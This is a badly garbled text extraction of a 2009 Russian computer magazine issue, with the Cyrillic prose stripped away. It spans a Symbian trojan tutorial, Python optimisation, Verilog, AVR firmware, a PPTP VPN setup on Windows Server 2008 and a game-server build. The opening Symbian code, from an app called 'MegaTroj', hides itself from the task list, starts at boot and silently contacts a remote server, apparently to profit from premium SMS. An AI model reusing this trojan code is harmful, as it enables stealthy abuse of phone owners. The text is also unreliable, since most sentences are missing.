aWgName->SetSystem(ETrue);
}

3) Symbian 7/8.
AppUi- ,
:
CEikonEnv::Static()->
RootWin().EnableReceiptOfFocus(EFalse);
//
CEikonEnv::Static()->
RootWin().SetOrdinalPosition(-1000,
ECoeWinPriorityNeverAtFront);

Symbian 9.
Symbian 7/8 , Symbian 9
, .

CAknViewAppUi ( , , AppUi-)
HandleForegroundEventL, ,
:
X 03 /123/ 09

>> coding
void CMegaTrojAppUi::HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground) {
case ETrue:
{
CEikonEnv::Static()->RootWin().SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv->WsSession());
task.SetWgId(
CEikonEnv::Static()->RootWin().Identifier());
task.SendToBackground();
}

Symbian 9. , , .
, :
1) (*.rss), UID3 .
, UID3 0x12345678, 12345678.
rss. :
#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO blacklist
{
executable_name = "c:\\sys\\bin\\YourApp.exe";
recovery = EStartupItemExPolicyNone;
}

2) MMP- :
break;
}
}

,
, task- ,
-
.



Symbian 7/8 Symbian 9.
Symbian 7/8. Symbian OS 9. ,

recognizers. Recognizers MIME- , , ,
,
.
, MIME-,
Series60 , Document Handler. ,
, , MMS-, WAP-, bluetooth
.. ,
, - . Series60 embedded
launching, ,
, ,
.
.
WEB- jpg-.
Image Viewer, .
MIME (UID).
Symbian OS ,
MIME-, recognizers.
recognizer dll, mdl c:\system\recogs .
MIME- / UID
recognizer.
.
:
recognizer *.bt ( ; ).
recognizera, , , , ,
, .
, , ,
. -
.
X 03 /123/ 09

START RESOURCE 12345678.rss


TARGETPATH \resource\apps
END

3) pkg- : C:\Symbian\9.1\S60_3rd_MR\
epoc32\data\z\resource\apps\12345678.rsc"-"c:\private\
101f875a\import\[12345678].rsc.
c:\private\101f875a\import ,
.
, , Symbian. .

, . :
1)
. GPRS-, WAP-
MMS- . CApSelect, ,
, (GPRS/WAP/MMS). ,

( CApSelect) ,
( , ,
).
2) ,
echo-, ( ) ,
. , -
0x01,0x02 0x03 , .

,
. , ..
.
3)
.
, ,
CApSelect. AppUi AppUi (,
, ):
CCommsDatabase* commDb = CCommsDatabase::NewL(
EDatabaseTypeIAP);
CleanupStack::PushL(commDb);
iSelect = CApSelect::NewLC (*commDb, KEApIspTypeAll,
EApBearerTypeGPRS, KEApSortNameAscending);
iConnectionEnabled = iSelect->MoveToFirst();
CleanupStack::Pop(iSelect);
CleanupStack::PopAndDestroy(commDb); //commDb

099

>> coding

Premium SMS
links



Symbian
http://dtarasov.ru.


forum.nokia.com.

dvd

, , sms - .
0,06 $5. sms Premium SMS.
, , ,
. , , -
(http://www.smstraffic.ru), .
:
1) .; (
- -, WebMoney ).
2) /-. , -
, .
, , , ,
-. - 12345
1234; 12345 , , .
3) , .
, sms ,
. , ,
.

commDB . ( CApSelect SDK). .


TCP,
forum.nokia.com. ,
observer (MtcpipIapCheckEngineObserver), TestCompleted, .
MTcpipIapCheckEngineObserver AppUi.
CIapCheckTcpEngine,
( ). ,
CIapCheckTcpEngine
AppUi TestCompleted,

. TestCompleted :
void CMegaTroyAppUi::TestCompleted
(TIapTestResult aTestResult)
{
if(aTestResult == EIapNotUsable)
{
GetNextIapId(); //

}
else
{
HandleCommandL(EConnectToServer);
//
}
}

, , .


,
sms,
( ).
PHP +

100

MySQL. . :
- http://yourhost.ru/megascript.php;
XML .
, . ,
.
forum.nokia.com
http-, GET-. AppUi :
iHTTPEngine->GetRequestL(iUri,iIapId);

iUri url , , iIapId , .


,
, sms.

SMS

, , http://dtarasov.ru.

, Symbian 9,
.
Symbian Platform Security, Symbian OS 9.1
. , ,
:
1) IMEI ( )
Symbian
Offline Signed.
IMEI, .
2) Symbian Express Signed
Certified Signed. Express Signed Certified Signed
, (20$),
X 03 /123/ 09

>> coding

.

. ,
. ,
,
- . Certified Signed .

!
,
IMEI ,
.
Express Signed. , Express Signed, Publisher ID. $200
,
TrustCenter. Publisher ID
http://dtarasov.ru. Publisher ID
:
1) trustcenter.de/order/publisherid/dev,
.
2) e-mail
,
().
3) - .
( ).
4)
, . ,
Express Signed
SymbianSigned.com.
, Publisher ID . . - . , Trustcenter
X 03 /123/ 09

, . Publisher ID
Express Signed
. :
1) .
2)
.
3) - SymbianSigned
.
4) , , .
5) , Publisher ID.
4 5 ( ), ,
,
. Publisher ID
, , ,
. Symbian Platform Security. , ,
? ,

, .
,
.

HAPPY END
, Symbian
, .

.
. ,
, , .
,
, ,
! z

101

>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /

PYTHONE

Python ,
.
, .
, Python ,
. :
.
Python .

.
,
,
. ,
, Python.


Python ,
. .
,
.
C,
, .
, , , .

102

, map(operator.add, l1, l2), , , map(lambda x,y: x+y, v1, v2).


.
Python (immutable objects).
, . ''.join(seq) ,
+=.
. ,
. ,
. %
. .
, , , . ,
range(n) n.
xrange(n) ,
X 03 /123/ 09

>> coding
,
. generator expressions,
list comprehensions.
, . , Python
, :).
, , , N (a in b)
, ,
.
, , .
- ,

. , . obj.foo()
.
, .
, .
:
, .
, , .
.
, . , , :
module_name = None
def delay_import():
global module_name
if module_name is None:
import module_name

module_name
delay_import().
. . NumPy (
,
).
MatLab. Python ,
MatLab, NumPy + Python open-source ,
. , Python- ,
PyRex. , Python.
Python ,
,
Python!

. Python
(batteries included!). profile ( cProfile), timeit
hotspot.
Hotspot
C.
,
. ,
,
.
profile
.
X 03 /123/ 09

, : ,
..
.
. profile profile.run('main_
function()'), ,
. .
( ) .
strip_dirs() :
import profile
import pstats
def main():
#
pass
profile.run('main()', 'main_prof')
stats = pstats.Stats('main_prof')
stats.strip_dirs()
stats.sort_stats('time')
stats.print_stats(5)

, ,
main_prof. stats ,
, .

,
( stats.add()).
cProfile , profile.

. , cProfile , profile Python. cProfile
, . profile, ,
Python.
timeit . ,
.
.
:
from timeit import Timer
x = 123
t1 = Timer('x * 2', 'from __main__ import x')
t2 = Timer('x + x', 'from __main__ import x')
number_of_calls = 10**7
time1 = t1.timeit(number = number_of_calls)
time2 = t2.timeit(number = number_of_calls)
print time1 / time2

, 1.26. ,
1520% , 2.
.

JIT-
, ( , !),

103

>> coding

links
wiki.python.org/
moin/PythonSpeed/
PerformanceTips


.
Must read!
www.python.org/doc/
essays/list2str.html
Python Patterns
An Optimization
Anecdote.
Python .
wiki.python.org/
moin/PythonSpeed
,
.

Gprof2Dot

. , , ,

.
:
, ,
, ? ,
(Python) - (-
).
. -

104

(, Java).
, .
-.
- , . ! ,

-, ?
(, .Net) JIT.
X 03 /123/ 09

>> coding

2001 Python 1.5


3d- Blade of Darkness,
. , 370 ,
!

. Python +
NumPy , MatLab. Python

CPython,
JIT- . PsyCo.

.
. . , PsyCo :
import psyco
psyco.full()
from psyco.classes import *
#

.
, profile() PsyCo
,
.
. , . , , :
JIT- foo,
20%. , PsyCo
.
Python pystone.py,
( , , .).
PsyCo . ,
PsyCo 450%! , , .
PsyCo 20% .
. , PsyCo
i386- .
, - .
PsyCo,
, :
if __name__ == '__main__':
try:
import psyco
X 03 /123/ 09

psyco.full()
#
except ImportError:
pass


PsyCo . , JTI-
, -, ,
.
,
.
PsyCo ,
PyPy.
, PsyCo .


, .
!
, , . ,
, ,
, . , ,
. ,
, .
.
,
Python -.
( )
. . ,
, , .
,
, . ,
. ,
,
. ,
.
, .

! z

105

>> phreaking
VSHMUK
/ DIVER@EDU.IOFFE.RU /

VERILOG

>> VERILOG
( ). , :
, , . Verilog, HDL (Hardware
Description Language).
.
erilog 1985 , .
IEEE 1364,

(Verilog-2001, SystemVerilog http:/ /en.wikipedia.org/wiki/
SystemVerilog), - .
, Verilog . -
, , ,
, - Altera Quartus ,
- .
C,
.
Verilog VHDL, ADA
Pascal , ,
. ,
, , ,
, .

HDL?
, -
. (
), - ,
(, ).
- HDL-.

106

HDL . ,
, , , ,
.
. .
HDL,
(hardware) :). ,
-, .
, ,
HDL, , . , , , !
,
Pascal HDL-. - ,
,
.
, , ?
. , -
. ,
, ,
, . Intel Core, , , .
X 03 /123/ 09

>> phreaking

Quartus 8.0


always
.
, Verilog.
1. . .
wait reg1==reg2; // ,
//
@ (A or B)
// .
//, A B
@ (posedge C or negedge D)

posedge negedge . ,
0 1 D 1 0,
. ?
. ,
.
. Verilog
always @(posedge sysclock)....
2. . .
reg1=reg2;

3. .
. ,
. ,
( =), ?
,
,
. - ?
.
reg1<=reg2;
X 03 /123/ 09

// reg1.
// .
reg3<=reg4;
// -,
// reg1.
......
// - reg1.

4. . .
if (reg1==2'b11) begin
reg2<=0;
end
else begin
reg2<=reg2+1b1;
end

5. . .
parameter WRITE = 2'b11, READ = 2'b10, NONE = 2'b00;
//
case (reg1)
WRITE: reg2<=reg2+1'b1;
READ,NONE: begin
reg2<=0;
end
default:
reg2<=0;
endcase

6. . for, while, repeat, forever.


forever .
repeat (- ) .
while () , .
for (,,)
for, .

107

>>
>> pc_zone
phreaking

- .

. HDL
, , , ,
!


, HDL- .
,
.
,
Altera Cyclone Quartus altera.com.
,

- , Verilog
,
. (0)
(1) z, . ,
x,
, ,
- .
z x ,
-
, .
:
4b10zz
// ,
,

108

,
!
, ,
HDL, .
, ,
.
-
, .
,
.
, . . , Verilog .


1. , , , .
- , , ,
. .
X 03 /123/ 09

>> phreaking

//
/*

*/

Verilog () ,
$ _, .
.
\,
. , , . : Character, cHaracter, $Character,
\c+Ha^racter.
Verilog . , (),
(b, o, d, h) . :
"7"h7F" // 127, (h hex) .
"7"b1111_1111' // , . "_" .
"10"b1111_1111" // 127, 7 , 10.
, 000_1111_1111.
//, -
, .
"18" // , , Integer.
"0.5" // float.

integer, time, real .


, , Verilog
.
, !
reg [2:6] Array [0:5]; //6 .

3. (wire).
, ,
, . -
, .
, -,
. ,
:
reg [7:0]device_config;
wire port_0_direction = device_config[0];
wire port_1_direction = device_config[1];
......
if (!port_0_direction)
device_data[0] <= par_
port_0[7:0];

port_0_direction device_config[0]. : , ,
device_config, :
port_0_direction = device_config[0] & device_config[2];

2. .
, , Verilog . :
reg [7:0] character;

8 ( )
character. ,
:
reg [7:0] var1;
reg [15:0] var2 = 16b1001_0110_1011_1101;
...skip...
var1 [7:0] = var2[15:8];

var1 var2, . , 8b1001_0110,


0x96h.
: , Verilog , reg.
X 03 /123/ 09

port_0_direction 1, 0 2
device_config.
(wand), (wor),
tri0, tri1 , .
4. always & initial.
, . , ,
.
, - , ,
.
reg[7:0] counter;
always
//always
// ,
@(posedge Sysclock)
// ";"
// .
begin
counter = counter + 1'b1;
end

109

>>
>> pc_zone
phreaking

, always.
@ ( ). begin end
.
Sysclock 0 1,
counter .

(=,<=,if,case, etc.) . Verilog .
always initial, .
5. .
, begin end, .
, C.
, :
reg[7:0] counter = 0;
reg[7:0] anticounter = 0;
always @(posedge Sysclock) fork
counter = counter + 1'b1;
//<--
anticounter = anticounter 1'b1;
//<--
join

counter anticounter -

110

. fork join
begin end, ,
!
6. .
(module) Verilog -
.
. ,
.

module Not (inputwire1, outwire1);
input inputwire1;
// ,
output outwire1;
reg outwire1;
always @(inputwire1)
outwire1<=!(inputwire1);
endmodule;

.
, .
, ,
. (input), (output) (inout).
X 03 /123/ 09

>>>>phreaking
pc_zone

, . Verilog
,
.
, , HDL , ,
, .
Timing Analysis,
. ,
, ,
.
.
, (<=) (=) , .

,
. ,
,
- ( ),
, ,
.

-
, .
always.
, ? , .

module Not1 (inputwire1, outwire1);
input inputwire1;
// ,
output outwire1;
reg outwire1;
assign outwire1 = !(inputwire1);
endmodule;

,
, ,
. ,
. ?
7. .
, , :
(+),
(-),
(*),
(/),
(%),
, , , XOR (&,|,~,^)
, , (&&,||,!),
(==,!=,>,<,>=,<=)
(>>,<<)

,
:
X 03 /123/ 09

(D, RS)

. a
b clock.
, switch. reset
0.
-
:).
module trig(clock, a, b, switch, reset, out);
input clock, reset;
//
input a, b;
//
input switch;
//
output out;

reg out;

// . ,
//,

wire in;
//
assign in = switch ? a : b;
//assign in = a ? 1 : 0;
//
D-,
//assign in = a;
//
RS-, Set "a", Reset "reset"
always @(posedge clock or posedge reset) //
if (reset)
// ,
out <= 0;
else
//
out <= in;
endmodule

reg[7:0] Lights=8'b0000_0001;
...skip...
Lights[7:0] = { Lights[0] , Lights[6:1] };

, 8
Lights. ,
, .
, . .

, . ,
, , .

,
. ,
. , -
, . z

111

>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /

>>
, - .
\\ ( ),
- , . , ,
. !
, , , ,
.
, ,
. , , , ,
, .
, , . ,
,
, .
? ,
! , ,
.

, , ,
, ,
.

,
( ,
- .).
, , ,

112

.
, .
, .
,
.. .
, , -
, .
.
, .
,
.
, , . . ,
, .
, , ,
( ). . ,
,
60 . :
!
, ,
?! ,
, .
X 03 /123/ 09

>> phreaking

CRT-.


.
20 . ,
, ? , ,
( ).
,
? ,
. , , .
, , ,
, .
, ,
,
.
,
. , ,
. , , ,
,

. ,
:
, 220
;
, (
, , )
, , , .
. ,
. ? ! , ,
.
. ?
,
. ,
, .
?
X 03 /123/ 09

. .
-

,
, . ,
, .
,
( , 1000 ! .
), .
, ,
(
, ). ,
. ,
,
.
, : , , ,
. ,
, .
, , ,
, . ,

dvd

, ,

.



1) .
2) ,
- ( ).
, ,
.
3) \ , 2
.
4) - . ,

.

113

>>
>> pc_zone
phreaking

. !

, .
.

links
-

.



?
http://ru.wikipedia.
org/wiki/

114

. ,
,
,
.
-.
, ,
. 5-6
,
. , ,
:
;
( - );
-
, ;
, .
:).
, ,
. 5 ,
( 4000 !).
, , , .

5 20
.
100 .
, ,
.

.
.
(
, ).
. .
.
.
.
, , 150- 200 . .
X 03 /123/ 09

>> phreaking

, ,
,
H2O


( )


, ,
,
, . -
, - !
,
,
,
, . , \ .
.
.
. 1 200 (
).
!
. ,
, ?.
:
X 03 /123/ 09

;
;
, ;
, ;
;
;
;
.
, ,
, . ,
. ,
, . . z

115

>> phreaking

DI_HALT@MAIL.RU

(DI HALT)

>>
, . ,
, . . ,
, , .

-
, Windows , , . , *nix-, QNX ucLinux.
, , , 32- . ? !
- ATMega128, ATTiny2313 2 . ,
,

116

700 , , .
600 ? .

?
AVR Studio, ,
? ?
, , . ,
, . , X 03 /123/ 09

>> phreaking

.
- . ,
, ,
, .
, .
, , ,
, .

, , ,
.

, ,
.
. ,
- , .
,
, ! , ,
. , -,
, ,
. . ,
. !

, , ! ()
, .
, .
.
, , .
, , , UART - INT0, -
. ,
, ,
, , .



. .
. .
. !
, .
. AVR , , . ,
. , ,
. .
UART. , ,
: , , .
,
UART, - .
, UART . ?
. : - .
.
. UART
.
: ,
. ,
, , . , UART , .


. . ! . ,

, , .
.
,


.
, , .
, , .
. AVR,
, . ,
86-, ,
. .

X 03 /123/ 09

117

>>
>> pc_zone
phreaking

. .
Motorola, Serg2x2
51,
AVR . ,
dlinyj (
,
ATTiny2313).
, .

. . , - .
(PC) ,
. RJMP BRxx, PC . .
- .
.
. -
, , .
. ,
, .
.
,
.
defconst.inc . ,
, . :
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ

EV_Idle
= 0 ; NOP
EV_KbdDataReceived = 1 ;
EV_UnlockKeys
=2;
= 3 ;
EV_DisplRegen
EV_SendPacket
=4;
EV_Timeout1
=5;
EV_Timeout2
= 6 ; Test ( )
EV_Timeout3
= 7 ; Test ( )
EV_Show
=8;
EV_TxComplete
=9;

, . , ,

118

, .
, .
LoggerAttiny2313.asm,
, , .
:
EventsProcs:
.dw Idle
; [00] EV_Idle
.dw Proc_KbdDataReceived ; [01] EV_KbdDataReceived
.dw Idle
; [02] EV_UnlockKeys
.dw Idle
; [03] EV_DisplRegen ;
.dw Idle
; [04] EV_SendPacket
.dw ProgTest1
; [05] EV_Test Displ
.dw ProgTest2
; [06] EV_Test LED
.dw ProgTest3
; [07] EV_Test UART
.dw Proc_ShowReceivedData ; [08] EV_Show

EventProcs ,
. dw
. 00 aka
EV_Idle, Idle,
LoggerAttiny2313.asm. [03]
EV_DisplRegen Idle, . ,
,
, . , , .
Idle.
, Proc_ShowReceivedData ProgTest3,
. . ,
, , .
:
Proc_KbdDataReceived:
NOP
NOP
NOP
Ret

, , ,
.
, . . defconst.inc, :
X 03 /123/ 09

>> phreaking
- ( ,
0xFF) , ,
.
,

.

.equ EventsQueueSize = 11
;
.equ EventsQueue = $A0
; A0 AA (11 bytes)

EventsQueueSize , ,
. 11, ,
.
EventsQueue . , .
, .
, ,
. ,
, , ,
.
SendEvent, kernel.inc. Tmp1
,
. :
ldi Tmp1, EV_DisplRegen
rcall SendEvent

, idle
watchdog.
MainLoop:
wdr
; watchdog
rcall ProcessTaskQueue
rcall Idle
;
rjmp MainLoop
Idle:
nop
ret

ProcessTaskQueue kernel.inc
X 03 /123/ 09



.
,
. T1
( ,

). ,


.

,
, .
: OutComp1AInt,
LoggerAttiny2313.asm.
, ,
. .
.
, 0FF
, . ,
,
. -
( ), ,
, . . ( , ),

, .
, .
, !
defconst.inc.
.equ TimersPoolSize
=5
;
.equ TimersPool = $B0
; B0-BE

TimersPoolSize . , ,
, . . 3
, ,
. ,
ProgTest1 06543 .
05:65:43. .

-.
AVR.
TimersPool . ,
.

RETI
, .
, , .
, . ! z

119

>> SYN/ACK

/ CORE@SYNACK.RU /

PPTP- WINDOWS SERVER 2008

.
,
. VPN-
PPTP. ,
, .
PPTP?
PPTP
, () IP-,
. PPTP :
TCP- ;
GRE ( )
PPP- .
( MPPE), (
MPPC) . PPTP ,
NAT-. Microsoft Windows, Windows 95
OSR2, PPTP-. PPTP Linux, xBSD Mac OS X.
, -

120

PPTP, ,
, L2TP, IPSec SSTP (PPTP , , VPN-,
PPTP, , , ,
). : PPTP
PPPoE.
,
, .


Vista Win2k8 PPP . SPAP, EAP-MD5-CHAP MS-CHAP, ( MD4
DES). :
X 03 /123/ 09

>> SYN/ACK

RRAS PPTP

PAP, CHAP, MSCHAP-v2 EAP-TLS (


-). MSCHAP-v2, . .
VPN- MPPE 40,
56 128- RSA RC4 . Windows - 40-
56-. , , Vista,
128- . , , Windows
- . ,
WinXP SP2 Win2k8.
, HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL. , Ciphers\RC4.
,
dword Enabled ffffffff. ,
Microsoft , 40/56- RC4 Win2k8.
1 HKLM\System\CurrentControlSet\Services\Rasman\
Parameters\AllowPPTPWeakCrypto .

Server). DHCP DNS. ,


VPN, RRAS .
L2TP SSTP, PPTP ,
(Certificate Services) . , VPN ( , ADSL
), ( ).
RRAS

PPTP WIN2K8
VPN , RRAS (Routing and Remote Access) NPS (Network Policy
X 03 /123/ 09

121

>> SYN/ACK

info
PPTP
IPsec
PKI


VPN-.
SSTP VPN
(
z 2008 ).

PoPToP/MPD
Windows

z 2007
.

RRAS VPN

VPN ( NAT ) , ,
.
(
),
(Network Access Services) -

,
(Routing and
Remote Access Services).
.
,
. -

RRAS Netsh
RRAS-
Netsh (network shell). :

PPP. PPP:
> Netsh ras add multilink MULTI|BACP

> Netsh ras add authtype PAP|MD5CHAP|MSCHAPv2|EAP


:
Windows MSCHAP|SPAP. :
> Netsh ras set user
> Netsh ras set authmode STANDARD|NODCC|BYPASS
RRAS- AD:

set client . RRAS


Netsh :

> Netsh ras add registeredserver


PPP:
> Netsh ras add link SWC|LCP
SWC , LCP -

122

> Netsh ras dump > filename


> Netsh exec filename
, ras aaaa.
Netsh 2009 .
X 03 /123/ 09

>> SYN/ACK

RRAS



; ,
,
.
( ) (Configure and Enable Routing
and Remote Access).
,
, . .
,
.
, :
(VPN ) () (VPN) ;
(NAT) IP-;
(VPN) NAT
, IP- ;

, .
. , SSTP (. VPN z_08_2008)
. PPTP
, ,
. ,
,
. , , , .
,
. , :
(VPN);
( );
( );
(NAT);
.
, , ,
. (VPN ),

(VPN). , ( ).
,
,
,
.

. VPN ,
VPN- .
Windows ,
, .
IP- IP-
VPN-:
.
RRAS, , RADIUS.
, RRAS
RADIUS. .
, , DHCP. RRAS DHCP-
, , Relay
agent (,
).

X 03 /123/ 09


.
, , . ,
. , VPN PPPoE. ,
.
. , PPTP-, L2TP- SSTP- () 128, (
). ()
,
.
. .

. IPv4 IPv6 IP-, , DHCP-
.

123

>> SYN/ACK

RRAS



; ,
,
.
( ) (Configure and Enable Routing
and Remote Access).
,
, . .
,
.
, :
(VPN ) () (VPN) ;
(NAT) IP-;
(VPN) NAT
, IP- ;

, .
. , SSTP (. VPN z_08_2008)
. PPTP
, ,
. ,
,
. , , , .
,
. , :
(VPN);
( );
( );
(NAT);
.
, , ,
. (VPN ),

(VPN). , ( ).
,
,
,
.

. VPN ,
VPN- .
Windows ,
, .
IP- IP-
VPN-:
.
RRAS, , RADIUS.
, RRAS
RADIUS. .
, , DHCP. RRAS DHCP-
, , Relay
agent (,
).

X 03 /123/ 09


.
, , . ,
. , VPN PPPoE. ,
.
. , PPTP-, L2TP- SSTP- () 128, (
). ()
,
.
. .

. IPv4 IPv6 IP-, , DHCP-
.

123

>> SYN/ACK

links
PPTP RFC
2637 www.ietf.org/
rfc/rfc2637.txt.
MPPE (Microsoft Point-to-Point
Encryption) www.ietf.
org/rfc/rfc3078.txt.
MPPC (MicrosoftPoint-to-Point
Compression) www.
ietf.org/rfc/rfc2118.
txt.

video



,
,
PPTP- Win2k8


.

, .
649: .
NPS. ,
.

( NPS ,
2008 ).


,
CMAK (Connection
Manager Administration Kit). CMAK ,

,
. Win2k8 CMAK
Win2k Win95.
, ,
.
CMAK Win2k8,
. .

.

.
,
.
, . : Vista Windows 2000/2003/XP. , Vista
SSTP. .
;
. (-

124

) , .
CMAK Program Files\CMAK\Profiles.
(Realm name), , Windows AD
(user@domain.com).
, . , , VPN-.

VPN- VPN- . txt- (
go.microsoft.com/fwlink/?LinkId=80962).
,
VPN. ( IPv6 ).
( ). IPv4 DNS WINS
.
PPTP- IP-.

. ,
, . VPN ,
VPN. :
.
PPTP PPTP. , .

, dial-up .
. , , ,
.
: . ,
IE. ,
,
(, ).
( ,
), , .
. , , .

, .
. ,
.

- :
.
, ,
.
! z
X 03 /123/ 09

>> SYN/ACK
GRINDER
/ GRINDER@UA.FM /

MEGAFAQ WINDOWS SERVER 2008

, Win2k8 . , .
.
?
Microsoft, 60 , .
60- , slmgr.
vbs -dli. , 60 , ,
240 . . 60
slmgr.vbs -rearm .
KB948472 (support.microsoft.com/
kb/948472). , . ,
.
WIN2K8?
Win2k8, Microsoft, , , ,
( ). Win2k8, Windows Server 2008 (Windows Server 2008 MUI
Language Pack) www.microsoft.com. -

126

. (32 64) : XXX_x86fre_Server_LP_4-KRMSLP4_DVD.img


XXX_amd64fre_Server_LP_4-KRMSLPX4_DVD.img. Itanium (ia64)
. , , -, . IMG-
. Regional and Language Options.
Keyboards and Languages Install/uninstall languages
.
,
WAIK. Hyper-V
Hyper-V Language Pack (support.microsoft.com/kb/951636).

AD WIN2K3 WIN2K8?
Win2k3 Win2k8 .
. -
. , Win2k3
SP1/SP2 R2. Full
installation, Server Core . . , x86 Win2k3 x64, Enterprise Edition Standard Edition.
:
Standard Enterprise.
, .
X 03 /123/ 09

>> SYN/ACK

WWT
Win2k8

WS2008: Upgrade Paths, Resource


Limits & Registry Values, blogs.technet.com.
AD , Win2k8 Flexible Single
Master Operations (FSMO) , .
AD .
, Active
Directory Migration Tool (ADMT):
, , . ADMT 3.1 ( ), ADMT v3.1 Guide: Migrating and Restructuring Active
Directory Domains , .

, ,
: , ?.
,
. : , . Access-Based Enumeration (ABE,
). ABE
(Share and Storage Management).
. ,
/ .

NETBIOS?
, Active Directory, NetBIOS , ,
DNS. , , . , ,
. Win2k8 . . :
MMC- ( ) .
,
. , ,
NetBIOS TCP/IP .
sc. ,
sc config /?. :


SERVER CORE?
Win2k8
. , . , ,
, Core Configurator.
Core Configurator . Server Core,
: , ,
, Remote Desktop, , , WinRM, , . , -
.
, . Server Core Configurator CodePlex (www.codeplex.com/CoreConfig)
Microsoft Public License (Ms-PL).
,
. SmartX
CoreConfigurator (www.smart-x.com), ( ) .

> sc start browser

NetBIOS net
view, Browstat.exe. support ( Win2k8) Browcon
(NetBIOS Browsing Console),
support.microsoft.com/kb/818092. :
> browstat.exe status WORKGROUP


?
, .
X 03 /123/ 09

GLOBALNAMES WINDOWS SERVER 2008?


DNS- GlobalNames,
(,
,
DNS- Win2k8). WINS
( NetBIOS IP-). ?
WINS, GlobalNames

127

>> SYN/ACK

ABE Win2k8

( , -) .
GlobalNames , .
GlobalNames . GlobalNames
.
.
DNS- GlobalNames DNS (DNS Manager) ,
(Forward Lookup Zones),
(New Zone). Active Directory.
GlobalNames. , (Do not allow dynamic updates).

?
Win2k8, . ,
.
. , (CA) , .
Exchange .
RENDOM (Rename Domain),
Win2k8,
Win2k3. RENDOM technet.microsoft.com/en-us/windowsserver/bb405948.aspx,
. Win2k8 NETDOM,
.
, , , , . , server.com server.ru:
> NETDOM computername server.com /add:server.ru

. DNS- A- . DNS-. :
> NETDOM computername server.com /makeprimary:server.ru

:
> NETDOM computername server.ru /remove:server.com

128

CoreConfigurator
Server Core

ADSI
Edit (AdsiEdit.msc), .
, Win2k3, .
ADSI Edit
(Remote Server Administration Tools). (Role Administration
Tools) Active Directory (Active Directory
Domain Services Tools)
Active Directory (Active Directory Domain Controller Tools).
ADSI .
msDS-AdditionalDnsHostName,
.


?
Active
Directory. , AD
Ntdsutil,
DSRM (Directory Services Restore Mode)
<F8> . Win2k8 AD , .
. Active Directory (Active
Directory Domain Services), ,
. .
, AD
( ): Kerberos (Kerberos Key Distribution Center), DNS, (Intersite Messaging),
DFS (DFS Replication).
/ AD DS
:
> sc stop NTDS
> sc start NTDS

AD DS ,
.
, Win2k8 DSRM. HKLM\System\
CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
:
X 03 /123/ 09

>> SYN/ACK

links

DNS-

ADSI Edit Win2k8

,
.
,
. WWT
, .
HTML- , Microsoft
.

Aero

0 ( )
DSRM , ;
1 DSRM,
AD DS ;
2 DSRM
.

,
WIN2K8?
. ,
, ( ). , ,
:
Works With Windows Server 2008 ,
;
Certified for Windows Server 2008 ,
, .
Hyper-V, .
Works With
Works With Tool for Windows Server
2008 (WWT).
, X 03 /123/ 09

WIN2K8
?
Win28 Vista ,
Vista . ( ,
64- ), Vista,
Win2k8.
Vista . (Desktop Experience). , (
, Aero), ,
.
:
> Servermanagercmd i Desktop-Experience

,
.
, .

:
>
>
>
>

Sc config
Net start
Sc config
Net start

themes start= auto


themes
audiosrv start= auto
audiosrv

,

,

Applications That Are
Known to Work With
RODCs
technet.microsoft.
com/en-us/library/
cc732790.aspx.

Win2k8
www.
microsoft.com/
windowsserver2008.

Microsoft Hyper-V
Server 2008
www.
microsoft.com/
servers/hyper-vserver.

info


][, 2008-,



Win2k8!
WAIK


( 2009).

Desktop-Experience, WirelessNetworking, BitLocker, Backup-Features,


Windows Search PowerShell.
, Win2k8 .
,
. z

129

>> SYN/ACK
TURBINA
/ V.TURBINA@GMAIL.COM /


LINUX

World of Warcraft Call of Duty


. , , .
.
?
MaNGOS (Massive Network Game Object Server, getmangos.com)
WoW.
Linux, FreeBSD Windows.
, WoW- .
NPC. MaNGOS
, ,
. ,
.
.

$ mkdir source; cd source

: , , . SVN ( git)
0.13, 3.0.3 (build
9183) 2.4.3. MaNGOS 0.12
2.4.3 . 0.13,
. :
$ svn co http://svn2.assembla.com/svn/mangos-svn-mirror

git:


, Ubuntu8.04LTS(
Linux-). ,
git/SVN- . MySQL ( ) PostgreSQL, . , OpenSSL .

$ git clone git://github.com/mangos/mangos.git

ScriptDev2 (sf.net/projects/scriptdev2).
, , :
$ mkdir mangos/src/bindings/ScriptDev2

$ sudo apt-get install libssl-dev mysql-server mysqlclient libmysqlclient15-dev autoconf automake1.9 libtool
build-essential subversion patch zlibc libc6 git git-core
zlibc

130

ScriptDev2, scriptdev2
Scriptdev2! :
$ cd mangos/src/bindings/ScriptDev2
$
svn
co
https://scriptdev2.svn.sourceforge.net/
X 03 /123/ 09

>> SYN/ACK

realmd

$ rm -r objdir

svnroot/scriptdev2

:
$ git apply src/bindings/ScriptDev2/patches/MaNGOS-200812-22-ScriptDev2.patch

:
$ patch -p0 < src/bindings/ScriptDev2/patches/MaNGOSr6765-ScriptDev2.patch

git . src/bindings .gitignore:


$ cat src/bindings/.gitignore
ScriptDev2

, ScriptDev2
. , :
$
$
$
$
$
$
$

cd ~/source/mangos
autoreconf --install --force
aclocal
autoheader
autoconf
automake --add-missing
automake src/bindings/ScriptDev2/Makefile

, ,
:
$ mkdir objdir; cd objdir
$ ./configure --enable-cli --enable-ra

(--enable-ra) (--enable-cli). , -prefix, --sysconfdir


--datadir. PostgreSQL,
--with-mysql=no --with-postgresql=yes.
:
$ make
$ sudo make install

:
$ make clean
$ cd ..
X 03 /123/ 09


,
sql :
$ mysql -u root -p < sql/create_mysql.sql

mangos, mangos mangos:


$ cat sql/create_mysql.sql

GRANT USAGE ON *.* TO 'mangos'@'localhost' IDENTIFIED BY


'mangos' WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_
PER_HOUR 0 MAX_UPDATES_PER_HOUR 0;


MySQL ( Ubuntu ). , :
$ mysql -u mangos -p mangos < sql/mangos.sql
$ mysql -u mangos -p realmd < sql/realmd.sql
$ mysql -u mangos -p characters < sql/characters.sql

ScriptDev2:
$ mysql -u mangos -p scriptdev2 < src/bindings/ScriptDev2/
sql/scriptdev2_structure.sql

, , .
.

?
, ,
. . , , . UDB (UnifiedDb, www.udbforums.org),
, YTDB (ytdb.kanet.ru), Silvermoon
(projectsilvermoon.net), Silver DataBase (SDB, opensvn.csie.org/SDB,
